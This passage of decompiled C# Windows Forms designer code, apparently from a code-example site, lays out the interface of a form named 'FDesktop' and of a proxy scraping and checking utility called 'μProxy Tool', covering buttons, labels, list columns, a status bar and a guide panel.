            this.Panel1.Anchor      = (global::System.Windows.Forms.AnchorStyles.Bottom | global::System.Windows.Forms.AnchorStyles.Left);
            this.Panel1.BackColor   = global::System.Drawing.Color.FromArgb(10, 10, 10);
            this.Panel1.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
            this.Panel1.Controls.Add(this.Button1);
            this.Panel1.Controls.Add(this.Label3);
            this.Panel1.Controls.Add(this.C2);
            this.Panel1.Controls.Add(this.CheckBox1);
            this.Panel1.Controls.Add(this.CheckBox2);
            this.Panel1.Controls.Add(this.Label1);
            this.Panel1.Controls.Add(this.CheckBox3);
            this.Panel1.Controls.Add(this.CheckBox4);
            this.Panel1.Controls.Add(this.C);
            this.Panel1.Controls.Add(this.C1);
            this.Panel1.Controls.Add(this.Label2);
            global::System.Windows.Forms.Control arg_AA6_0 = this.Panel1;
            location           = new global::System.Drawing.Point(-4, 328);
            arg_AA6_0.Location = location;
            this.Panel1.Name   = "Panel1";
            global::System.Windows.Forms.Control arg_AD0_0 = this.Panel1;
            size                  = new global::System.Drawing.Size(531, 52);
            arg_AD0_0.Size        = size;
            this.Panel1.TabIndex  = 52;
            this.Panel2.BackColor = global::System.Drawing.Color.Black;
            this.Panel2.Controls.Add(this.TextBox1);
            this.Panel2.Controls.Add(this.Panel1);
            this.Panel2.Controls.Add(this.P1);
            this.Panel2.Dock = global::System.Windows.Forms.DockStyle.Fill;
            global::System.Windows.Forms.Control arg_B50_0 = this.Panel2;
            location           = new global::System.Drawing.Point(0, 0);
            arg_B50_0.Location = location;
            this.Panel2.Name   = "Panel2";
            global::System.Windows.Forms.Control arg_B7D_0 = this.Panel2;
            size                      = new global::System.Drawing.Size(610, 379);
            arg_B7D_0.Size            = size;
            this.Panel2.TabIndex      = 53;
            this.TextBox1.Anchor      = global::System.Windows.Forms.AnchorStyles.None;
            this.TextBox1.BackColor   = global::System.Drawing.Color.MediumBlue;
            this.TextBox1.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
            this.TextBox1.Font        = new global::System.Drawing.Font("Arial", 14f);
            this.TextBox1.ForeColor   = global::System.Drawing.Color.WhiteSmoke;
            global::System.Windows.Forms.Control arg_BF9_0 = this.TextBox1;
            location                = new global::System.Drawing.Point(139, 135);
            arg_BF9_0.Location      = location;
            this.TextBox1.Multiline = true;
            this.TextBox1.Name      = "TextBox1";
            this.TextBox1.ReadOnly  = true;
            global::System.Windows.Forms.Control arg_C3B_0 = this.TextBox1;
            size                    = new global::System.Drawing.Size(332, 71);
            arg_C3B_0.Size          = size;
            this.TextBox1.TabIndex  = 54;
            this.TextBox1.Text      = "\r\nCtrl+O for Hide or Show Options.\r\n           \r\n";
            this.TextBox1.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
            this.Timer2.Interval    = 5000;
            global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 14f);
            this.AutoScaleDimensions = autoScaleDimensions;
            this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
            this.BackColor           = global::System.Drawing.Color.FromArgb(10, 10, 10);
            size            = new global::System.Drawing.Size(610, 379);
            this.ClientSize = size;
            this.Controls.Add(this.Panel2);
            this.Controls.Add(this.Button2);
            this.Font          = new global::System.Drawing.Font("Arial", 8.25f);
            this.ForeColor     = global::System.Drawing.Color.WhiteSmoke;
            this.KeyPreview    = true;
            this.Name          = "FDesktop";
            this.ShowIcon      = false;
            this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
            ((global::System.ComponentModel.ISupportInitialize) this.C).EndInit();
            ((global::System.ComponentModel.ISupportInitialize) this.P1).EndInit();
            this.ContextMenuStrip1.ResumeLayout(false);
            this.Panel1.ResumeLayout(false);
            this.Panel1.PerformLayout();
            this.Panel2.ResumeLayout(false);
            this.Panel2.PerformLayout();
            this.ResumeLayout(false);
        }
Exemple #9
0
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::μProxy_Tool.Main));
     this.Menu_S = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.LoadProxiesToolStripMenuItem    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopyProxyToolStripMenuItem      = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ExportToolStripMenuItem         = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ClearListToolStripMenuItem      = new global::System.Windows.Forms.ToolStripMenuItem();
     this.RemoveSelectedToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AboutToolStripMenuItem1         = new global::System.Windows.Forms.ToolStripMenuItem();
     this.btn_Stop        = new global::System.Windows.Forms.Button();
     this.lbl_3           = new global::System.Windows.Forms.Label();
     this.lbl_2           = new global::System.Windows.Forms.Label();
     this.lbl_1           = new global::System.Windows.Forms.Label();
     this.btn_About       = new global::System.Windows.Forms.Button();
     this.lb_border3      = new global::System.Windows.Forms.Label();
     this.Sp_1            = new global::System.Windows.Forms.Label();
     this.btn_Export      = new global::System.Windows.Forms.Button();
     this.btn_Settings    = new global::System.Windows.Forms.Button();
     this.btn_Clear       = new global::System.Windows.Forms.Button();
     this.btn_Check       = new global::System.Windows.Forms.Button();
     this.SaveAll         = new global::System.Windows.Forms.Button();
     this.OpenFile_Btn    = new global::System.Windows.Forms.Button();
     this.Scrape_btn      = new global::System.Windows.Forms.Button();
     this.lb_border1      = new global::System.Windows.Forms.Label();
     this.tooltip         = new global::System.Windows.Forms.ToolTip(this.components);
     this.lb_info         = new global::System.Windows.Forms.Label();
     this.guide_icon      = new global::System.Windows.Forms.PictureBox();
     this.panel_guide     = new global::System.Windows.Forms.Panel();
     this.lb_close        = new global::System.Windows.Forms.Label();
     this.lb_detail       = new global::System.Windows.Forms.Label();
     this.lb_border       = new global::System.Windows.Forms.Label();
     this.Status          = new global::System.Windows.Forms.StatusStrip();
     this.status_lbl      = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.status_progress = new global::System.Windows.Forms.ToolStripProgressBar();
     this.status_per      = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.ListView1       = new global::μProxy_Tool.DoubleBufferedListView();
     this.ColumnHeader1   = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader2   = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader3   = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader4   = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader5   = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader6   = new global::System.Windows.Forms.ColumnHeader();
     this.Menu_S.SuspendLayout();
     ((global::System.ComponentModel.ISupportInitialize) this.guide_icon).BeginInit();
     this.panel_guide.SuspendLayout();
     this.Status.SuspendLayout();
     this.SuspendLayout();
     this.Menu_S.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.LoadProxiesToolStripMenuItem,
         this.CopyProxyToolStripMenuItem,
         this.ExportToolStripMenuItem,
         this.ClearListToolStripMenuItem,
         this.RemoveSelectedToolStripMenuItem,
         this.AboutToolStripMenuItem1
     });
     this.Menu_S.Name            = "ContextMenuStrip1";
     this.Menu_S.ShowImageMargin = false;
     global::System.Windows.Forms.Control arg_293_0 = this.Menu_S;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(140, 136);
     arg_293_0.Size = size;
     this.LoadProxiesToolStripMenuItem.Name = "LoadProxiesToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_2BD_0 = this.LoadProxiesToolStripMenuItem;
     size           = new global::System.Drawing.Size(139, 22);
     arg_2BD_0.Size = size;
     this.LoadProxiesToolStripMenuItem.Text = "Load Proxies";
     this.CopyProxyToolStripMenuItem.Name   = "CopyProxyToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_2F7_0 = this.CopyProxyToolStripMenuItem;
     size           = new global::System.Drawing.Size(139, 22);
     arg_2F7_0.Size = size;
     this.CopyProxyToolStripMenuItem.Text = "Copy Proxy";
     this.ExportToolStripMenuItem.Name    = "ExportToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_331_0 = this.ExportToolStripMenuItem;
     size           = new global::System.Drawing.Size(139, 22);
     arg_331_0.Size = size;
     this.ExportToolStripMenuItem.Text    = "Export";
     this.ClearListToolStripMenuItem.Name = "ClearListToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_36B_0 = this.ClearListToolStripMenuItem;
     size           = new global::System.Drawing.Size(139, 22);
     arg_36B_0.Size = size;
     this.ClearListToolStripMenuItem.Text      = "Clear List";
     this.RemoveSelectedToolStripMenuItem.Name = "RemoveSelectedToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_3A5_0 = this.RemoveSelectedToolStripMenuItem;
     size           = new global::System.Drawing.Size(139, 22);
     arg_3A5_0.Size = size;
     this.RemoveSelectedToolStripMenuItem.Text = "Remove Selected";
     this.AboutToolStripMenuItem1.Name         = "AboutToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_3DF_0 = this.AboutToolStripMenuItem1;
     size           = new global::System.Drawing.Size(139, 22);
     arg_3DF_0.Size = size;
     this.AboutToolStripMenuItem1.Text = "About";
     this.btn_Stop.Enabled             = false;
     this.btn_Stop.FlatStyle           = global::System.Windows.Forms.FlatStyle.Flat;
     this.btn_Stop.ForeColor           = global::System.Drawing.SystemColors.Window;
     this.btn_Stop.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("btn_Stop.Image");
     global::System.Windows.Forms.Control arg_44C_0 = this.btn_Stop;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(234, 4);
     arg_44C_0.Location = location;
     this.btn_Stop.Name = "btn_Stop";
     global::System.Windows.Forms.Control arg_473_0 = this.btn_Stop;
     size                   = new global::System.Drawing.Size(45, 40);
     arg_473_0.Size         = size;
     this.btn_Stop.TabIndex = 4;
     this.tooltip.SetToolTip(this.btn_Stop, "Stop Scraper/Checker");
     this.btn_Stop.UseVisualStyleBackColor = true;
     this.lbl_3.AutoSize  = true;
     this.lbl_3.Font      = new global::System.Drawing.Font("Microsoft Sans Serif", 9f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.lbl_3.ForeColor = global::System.Drawing.SystemColors.ControlDark;
     global::System.Windows.Forms.Control arg_4F5_0 = this.lbl_3;
     location           = new global::System.Drawing.Point(354, 45);
     arg_4F5_0.Location = location;
     this.lbl_3.Name    = "lbl_3";
     global::System.Windows.Forms.Control arg_51F_0 = this.lbl_3;
     size                 = new global::System.Drawing.Size(147, 15);
     arg_51F_0.Size       = size;
     this.lbl_3.TabIndex  = 17;
     this.lbl_3.Text      = "Export     Settings     About";
     this.lbl_2.AutoSize  = true;
     this.lbl_2.Font      = new global::System.Drawing.Font("Microsoft Sans Serif", 9f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.lbl_2.ForeColor = global::System.Drawing.SystemColors.ControlDark;
     global::System.Windows.Forms.Control arg_58D_0 = this.lbl_2;
     location           = new global::System.Drawing.Point(124, 45);
     arg_58D_0.Location = location;
     this.lbl_2.Name    = "lbl_2";
     global::System.Windows.Forms.Control arg_5B7_0 = this.lbl_2;
     size                 = new global::System.Drawing.Size(203, 15);
     arg_5B7_0.Size       = size;
     this.lbl_2.TabIndex  = 16;
     this.lbl_2.Text      = "Scrape      Check        Stop         Clear";
     this.lbl_1.AutoSize  = true;
     this.lbl_1.Font      = new global::System.Drawing.Font("Microsoft Sans Serif", 9f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.lbl_1.ForeColor = global::System.Drawing.SystemColors.ControlDark;
     global::System.Windows.Forms.Control arg_624_0 = this.lbl_1;
     location           = new global::System.Drawing.Point(8, 45);
     arg_624_0.Location = location;
     this.lbl_1.Name    = "lbl_1";
     global::System.Windows.Forms.Control arg_64B_0 = this.lbl_1;
     size                     = new global::System.Drawing.Size(89, 15);
     arg_64B_0.Size           = size;
     this.lbl_1.TabIndex      = 15;
     this.lbl_1.Text          = "Load         Save";
     this.btn_About.BackColor = global::System.Drawing.SystemColors.Window;
     this.btn_About.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
     this.btn_About.ForeColor = global::System.Drawing.SystemColors.Window;
     this.btn_About.Image     = (global::System.Drawing.Image)componentResourceManager.GetObject("btn_About.Image");
     global::System.Windows.Forms.Control arg_6C9_0 = this.btn_About;
     location            = new global::System.Drawing.Point(460, 4);
     arg_6C9_0.Location  = location;
     this.btn_About.Name = "btn_About";
     global::System.Windows.Forms.Control arg_6F0_0 = this.btn_About;
     size                    = new global::System.Drawing.Size(45, 40);
     arg_6F0_0.Size          = size;
     this.btn_About.TabIndex = 8;
     this.tooltip.SetToolTip(this.btn_About, "About");
     this.btn_About.UseVisualStyleBackColor = false;
     this.lb_border3.BorderStyle            = global::System.Windows.Forms.BorderStyle.Fixed3D;
     global::System.Windows.Forms.Control arg_744_0 = this.lb_border3;
     location             = new global::System.Drawing.Point(339, 4);
     arg_744_0.Location   = location;
     this.lb_border3.Name = "lb_border3";
     global::System.Windows.Forms.Control arg_76A_0 = this.lb_border3;
     size                     = new global::System.Drawing.Size(2, 56);
     arg_76A_0.Size           = size;
     this.lb_border3.TabIndex = 13;
     this.Sp_1.BorderStyle    = global::System.Windows.Forms.BorderStyle.Fixed3D;
     global::System.Windows.Forms.Control arg_79A_0 = this.Sp_1;
     location           = new global::System.Drawing.Point(113, 4);
     arg_79A_0.Location = location;
     this.Sp_1.Name     = "Sp_1";
     global::System.Windows.Forms.Control arg_7C0_0 = this.Sp_1;
     size                      = new global::System.Drawing.Size(2, 56);
     arg_7C0_0.Size            = size;
     this.Sp_1.TabIndex        = 9;
     this.btn_Export.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
     this.btn_Export.ForeColor = global::System.Drawing.SystemColors.Window;
     this.btn_Export.Image     = (global::System.Drawing.Image)componentResourceManager.GetObject("btn_Export.Image");
     global::System.Windows.Forms.Control arg_81E_0 = this.btn_Export;
     location             = new global::System.Drawing.Point(352, 4);
     arg_81E_0.Location   = location;
     this.btn_Export.Name = "btn_Export";
     global::System.Windows.Forms.Control arg_845_0 = this.btn_Export;
     size                     = new global::System.Drawing.Size(45, 40);
     arg_845_0.Size           = size;
     this.btn_Export.TabIndex = 6;
     this.tooltip.SetToolTip(this.btn_Export, "Export Proxies");
     this.btn_Export.UseVisualStyleBackColor = true;
     this.btn_Settings.FlatStyle             = global::System.Windows.Forms.FlatStyle.Flat;
     this.btn_Settings.ForeColor             = global::System.Drawing.SystemColors.Window;
     this.btn_Settings.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("btn_Settings.Image");
     global::System.Windows.Forms.Control arg_8C4_0 = this.btn_Settings;
     location               = new global::System.Drawing.Point(406, 4);
     arg_8C4_0.Location     = location;
     this.btn_Settings.Name = "btn_Settings";
     global::System.Windows.Forms.Control arg_8EB_0 = this.btn_Settings;
     size                       = new global::System.Drawing.Size(45, 40);
     arg_8EB_0.Size             = size;
     this.btn_Settings.TabIndex = 7;
     this.tooltip.SetToolTip(this.btn_Settings, "μProxy Settings");
     this.btn_Settings.UseVisualStyleBackColor = true;
     this.btn_Clear.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
     this.btn_Clear.ForeColor = global::System.Drawing.SystemColors.Window;
     this.btn_Clear.Image     = (global::System.Drawing.Image)componentResourceManager.GetObject("btn_Clear.Image");
     global::System.Windows.Forms.Control arg_96A_0 = this.btn_Clear;
     location            = new global::System.Drawing.Point(289, 4);
     arg_96A_0.Location  = location;
     this.btn_Clear.Name = "btn_Clear";
     global::System.Windows.Forms.Control arg_991_0 = this.btn_Clear;
     size                    = new global::System.Drawing.Size(45, 40);
     arg_991_0.Size          = size;
     this.btn_Clear.TabIndex = 5;
     this.tooltip.SetToolTip(this.btn_Clear, "Clear Proxies");
     this.btn_Clear.UseVisualStyleBackColor = true;
     this.btn_Check.Enabled   = false;
     this.btn_Check.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
     this.btn_Check.ForeColor = global::System.Drawing.SystemColors.Window;
     this.btn_Check.Image     = (global::System.Drawing.Image)componentResourceManager.GetObject("btn_Check.Image");
     global::System.Windows.Forms.Control arg_A1C_0 = this.btn_Check;
     location            = new global::System.Drawing.Point(179, 4);
     arg_A1C_0.Location  = location;
     this.btn_Check.Name = "btn_Check";
     global::System.Windows.Forms.Control arg_A43_0 = this.btn_Check;
     size                    = new global::System.Drawing.Size(45, 40);
     arg_A43_0.Size          = size;
     this.btn_Check.TabIndex = 3;
     this.tooltip.SetToolTip(this.btn_Check, "Check Proxy List");
     this.btn_Check.UseVisualStyleBackColor = true;
     this.SaveAll.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
     this.SaveAll.ForeColor = global::System.Drawing.SystemColors.Window;
     this.SaveAll.Image     = (global::System.Drawing.Image)componentResourceManager.GetObject("SaveAll.Image");
     global::System.Windows.Forms.Control arg_ABF_0 = this.SaveAll;
     location           = new global::System.Drawing.Point(58, 4);
     arg_ABF_0.Location = location;
     this.SaveAll.Name  = "SaveAll";
     global::System.Windows.Forms.Control arg_AE6_0 = this.SaveAll;
     size                  = new global::System.Drawing.Size(45, 40);
     arg_AE6_0.Size        = size;
     this.SaveAll.TabIndex = 1;
     this.tooltip.SetToolTip(this.SaveAll, "Save All Proxy List");
     this.SaveAll.UseVisualStyleBackColor = true;
     this.OpenFile_Btn.FlatStyle          = global::System.Windows.Forms.FlatStyle.Flat;
     this.OpenFile_Btn.ForeColor          = global::System.Drawing.SystemColors.Window;
     this.OpenFile_Btn.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("OpenFile_Btn.Image");
     global::System.Windows.Forms.Control arg_B61_0 = this.OpenFile_Btn;
     location               = new global::System.Drawing.Point(4, 4);
     arg_B61_0.Location     = location;
     this.OpenFile_Btn.Name = "OpenFile_Btn";
     global::System.Windows.Forms.Control arg_B88_0 = this.OpenFile_Btn;
     size                       = new global::System.Drawing.Size(45, 40);
     arg_B88_0.Size             = size;
     this.OpenFile_Btn.TabIndex = 0;
     this.tooltip.SetToolTip(this.OpenFile_Btn, "Open Proxy List");
     this.OpenFile_Btn.UseVisualStyleBackColor = true;
     this.Scrape_btn.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
     this.Scrape_btn.ForeColor = global::System.Drawing.SystemColors.Window;
     this.Scrape_btn.Image     = (global::System.Drawing.Image)componentResourceManager.GetObject("Scrape_btn.Image");
     global::System.Windows.Forms.Control arg_C04_0 = this.Scrape_btn;
     location             = new global::System.Drawing.Point(124, 4);
     arg_C04_0.Location   = location;
     this.Scrape_btn.Name = "Scrape_btn";
     global::System.Windows.Forms.Control arg_C2B_0 = this.Scrape_btn;
     size                     = new global::System.Drawing.Size(45, 40);
     arg_C2B_0.Size           = size;
     this.Scrape_btn.TabIndex = 2;
     this.tooltip.SetToolTip(this.Scrape_btn, "Scrape Proxies");
     this.Scrape_btn.UseVisualStyleBackColor = true;
     this.lb_border1.BorderStyle             = global::System.Windows.Forms.BorderStyle.Fixed3D;
     global::System.Windows.Forms.Control arg_C7C_0 = this.lb_border1;
     location             = new global::System.Drawing.Point(4, 63);
     arg_C7C_0.Location   = location;
     this.lb_border1.Name = "lb_border1";
     global::System.Windows.Forms.Control arg_CA5_0 = this.lb_border1;
     size                     = new global::System.Drawing.Size(652, 1);
     arg_CA5_0.Size           = size;
     this.lb_border1.TabIndex = 19;
     this.lb_info.AutoSize    = true;
     this.lb_info.Font        = new global::System.Drawing.Font("Calibri", 11.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
     this.lb_info.ForeColor   = global::System.Drawing.Color.FromArgb(37, 183, 211);
     global::System.Windows.Forms.Control arg_D0E_0 = this.lb_info;
     location           = new global::System.Drawing.Point(27, 3);
     arg_D0E_0.Location = location;
     this.lb_info.Name  = "lb_info";
     global::System.Windows.Forms.Control arg_D35_0 = this.lb_info;
     size                  = new global::System.Drawing.Size(84, 18);
     arg_D35_0.Size        = size;
     this.lb_info.TabIndex = 21;
     this.lb_info.Text     = "Quick Guide";
     this.tooltip.SetToolTip(this.lb_info, "Guide on μProxy Tool");
     this.guide_icon.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("guide_icon.Image");
     global::System.Windows.Forms.Control arg_D99_0 = this.guide_icon;
     location             = new global::System.Drawing.Point(6, 4);
     arg_D99_0.Location   = location;
     this.guide_icon.Name = "guide_icon";
     global::System.Windows.Forms.Control arg_DC0_0 = this.guide_icon;
     size                     = new global::System.Drawing.Size(16, 16);
     arg_DC0_0.Size           = size;
     this.guide_icon.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.AutoSize;
     this.guide_icon.TabIndex = 22;
     this.guide_icon.TabStop  = false;
     this.tooltip.SetToolTip(this.guide_icon, "Guide on μProxy Tool");
     this.panel_guide.Anchor      = global::System.Windows.Forms.AnchorStyles.None;
     this.panel_guide.BackColor   = global::System.Drawing.Color.Transparent;
     this.panel_guide.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
     this.panel_guide.Controls.Add(this.lb_close);
     this.panel_guide.Controls.Add(this.lb_detail);
     this.panel_guide.Controls.Add(this.guide_icon);
     this.panel_guide.Controls.Add(this.lb_info);
     this.panel_guide.Controls.Add(this.lb_border);
     global::System.Windows.Forms.Control arg_EAF_0 = this.panel_guide;
     location              = new global::System.Drawing.Point(156, 152);
     arg_EAF_0.Location    = location;
     this.panel_guide.Name = "panel_guide";
     global::System.Windows.Forms.Control arg_EDC_0 = this.panel_guide;
     size                      = new global::System.Drawing.Size(348, 155);
     arg_EDC_0.Size            = size;
     this.panel_guide.TabIndex = 20;
     this.lb_close.AutoSize    = true;
     this.lb_close.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
     this.lb_close.Cursor      = global::System.Windows.Forms.Cursors.Default;
     this.lb_close.Font        = new global::System.Drawing.Font("Microsoft Sans Serif", 8.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.lb_close.ForeColor   = global::System.Drawing.SystemColors.GrayText;
     global::System.Windows.Forms.Control arg_F58_0 = this.lb_close;
     location           = new global::System.Drawing.Point(320, 2);
     arg_F58_0.Location = location;
     this.lb_close.Name = "lb_close";
     global::System.Windows.Forms.Control arg_F7F_0 = this.lb_close;
     size                     = new global::System.Drawing.Size(22, 15);
     arg_F7F_0.Size           = size;
     this.lb_close.TabIndex   = 24;
     this.lb_close.Text       = " X ";
     this.lb_detail.AutoSize  = true;
     this.lb_detail.Font      = new global::System.Drawing.Font("Calibri", 9f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.lb_detail.ForeColor = global::System.Drawing.SystemColors.ControlDarkDark;
     global::System.Windows.Forms.Control arg_FED_0 = this.lb_detail;
     location            = new global::System.Drawing.Point(9, 33);
     arg_FED_0.Location  = location;
     this.lb_detail.Name = "lb_detail";
     global::System.Windows.Forms.Control arg_1017_0 = this.lb_detail;
     size                       = new global::System.Drawing.Size(328, 112);
     arg_1017_0.Size            = size;
     this.lb_detail.TabIndex    = 23;
     this.lb_detail.Text        = componentResourceManager.GetString("lb_detail.Text");
     this.lb_border.BorderStyle = global::System.Windows.Forms.BorderStyle.Fixed3D;
     global::System.Windows.Forms.Control arg_105D_0 = this.lb_border;
     location            = new global::System.Drawing.Point(0, 25);
     arg_105D_0.Location = location;
     this.lb_border.Name = "lb_border";
     global::System.Windows.Forms.Control arg_1086_0 = this.lb_border;
     size                    = new global::System.Drawing.Size(345, 1);
     arg_1086_0.Size         = size;
     this.lb_border.TabIndex = 20;
     this.Status.BackColor   = global::System.Drawing.Color.Transparent;
     this.Status.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.status_lbl,
         this.status_progress,
         this.status_per
     });
     global::System.Windows.Forms.Control arg_10F0_0 = this.Status;
     location            = new global::System.Drawing.Point(0, 364);
     arg_10F0_0.Location = location;
     this.Status.Name    = "Status";
     global::System.Windows.Forms.Control arg_111A_0 = this.Status;
     size                      = new global::System.Drawing.Size(660, 22);
     arg_111A_0.Size           = size;
     this.Status.TabIndex      = 20;
     this.Status.TabStop       = true;
     this.Status.Text          = "StatusStrip1";
     this.status_lbl.ForeColor = global::System.Drawing.Color.FromArgb(64, 64, 64);
     this.status_lbl.Name      = "status_lbl";
     global::System.Windows.Forms.ToolStripItem arg_1180_0 = this.status_lbl;
     size                      = new global::System.Drawing.Size(64, 17);
     arg_1180_0.Size           = size;
     this.status_lbl.Text      = "Status: Idle";
     this.status_progress.Name = "status_progress";
     global::System.Windows.Forms.ToolStripControlHost arg_11B7_0 = this.status_progress;
     size                      = new global::System.Drawing.Size(100, 16);
     arg_11B7_0.Size           = size;
     this.status_per.ForeColor = global::System.Drawing.Color.FromArgb(64, 64, 64);
     this.status_per.Name      = "status_per";
     global::System.Windows.Forms.ToolStripItem arg_11F4_0 = this.status_per;
     size                     = new global::System.Drawing.Size(23, 17);
     arg_11F4_0.Size          = size;
     this.status_per.Text     = "0%";
     this.ListView1.Anchor    = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Bottom | global::System.Windows.Forms.AnchorStyles.Left | global::System.Windows.Forms.AnchorStyles.Right);
     this.ListView1.BackColor = global::System.Drawing.SystemColors.Window;
     this.ListView1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader1,
         this.ColumnHeader2,
         this.ColumnHeader3,
         this.ColumnHeader4,
         this.ColumnHeader5,
         this.ColumnHeader6
     });
     this.ListView1.ContextMenuStrip = this.Menu_S;
     this.ListView1.Font             = new global::System.Drawing.Font("Franklin Gothic Book", 9.75f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.ListView1.ForeColor        = global::System.Drawing.SystemColors.ControlDarkDark;
     this.ListView1.FullRowSelect    = true;
     this.ListView1.GridLines        = true;
     global::System.Windows.Forms.Control arg_12E4_0 = this.ListView1;
     location            = new global::System.Drawing.Point(5, 68);
     arg_12E4_0.Location = location;
     global::System.Windows.Forms.Control arg_12FC_0 = this.ListView1;
     global::System.Windows.Forms.Padding margin     = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
     arg_12FC_0.Margin   = margin;
     this.ListView1.Name = "ListView1";
     global::System.Windows.Forms.Control arg_1329_0 = this.ListView1;
     size                    = new global::System.Drawing.Size(650, 296);
     arg_1329_0.Size         = size;
     this.ListView1.TabIndex = 12;
     this.ListView1.UseCompatibleStateImageBehavior = false;
     this.ListView1.View          = global::System.Windows.Forms.View.Details;
     this.ColumnHeader1.Text      = "#";
     this.ColumnHeader1.Width     = 45;
     this.ColumnHeader2.Text      = "Proxy";
     this.ColumnHeader2.Width     = 161;
     this.ColumnHeader3.Text      = "Country";
     this.ColumnHeader3.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
     this.ColumnHeader3.Width     = 125;
     this.ColumnHeader4.Text      = "Anonymity";
     this.ColumnHeader4.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
     this.ColumnHeader4.Width     = 115;
     this.ColumnHeader5.Text      = "Url Passed";
     this.ColumnHeader5.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
     this.ColumnHeader5.Width     = 89;
     this.ColumnHeader6.Text      = "Time (ms)";
     this.ColumnHeader6.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
     this.ColumnHeader6.Width     = 82;
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 16f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.White;
     size            = new global::System.Drawing.Size(660, 386);
     this.ClientSize = size;
     this.Controls.Add(this.panel_guide);
     this.Controls.Add(this.lb_border1);
     this.Controls.Add(this.btn_Stop);
     this.Controls.Add(this.lbl_3);
     this.Controls.Add(this.ListView1);
     this.Controls.Add(this.lbl_2);
     this.Controls.Add(this.lbl_1);
     this.Controls.Add(this.OpenFile_Btn);
     this.Controls.Add(this.btn_About);
     this.Controls.Add(this.Scrape_btn);
     this.Controls.Add(this.lb_border3);
     this.Controls.Add(this.SaveAll);
     this.Controls.Add(this.btn_Check);
     this.Controls.Add(this.Sp_1);
     this.Controls.Add(this.btn_Clear);
     this.Controls.Add(this.btn_Export);
     this.Controls.Add(this.btn_Settings);
     this.Controls.Add(this.Status);
     this.Font            = new global::System.Drawing.Font("Arial Narrow", 9.75f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.ForeColor       = global::System.Drawing.SystemColors.ControlText;
     this.FormBorderStyle = global::System.Windows.Forms.FormBorderStyle.FixedDialog;
     this.Icon            = (global::System.Drawing.Icon)componentResourceManager.GetObject("$this.Icon");
     margin             = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
     this.Margin        = margin;
     this.MaximizeBox   = false;
     this.Name          = "Main";
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "μProxy Tool";
     this.Menu_S.ResumeLayout(false);
     ((global::System.ComponentModel.ISupportInitialize) this.guide_icon).EndInit();
     this.panel_guide.ResumeLayout(false);
     this.panel_guide.PerformLayout();
     this.Status.ResumeLayout(false);
     this.Status.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Exemple #10
0
		private void InitializeComponent()
		{
			this.components = new global::System.ComponentModel.Container();
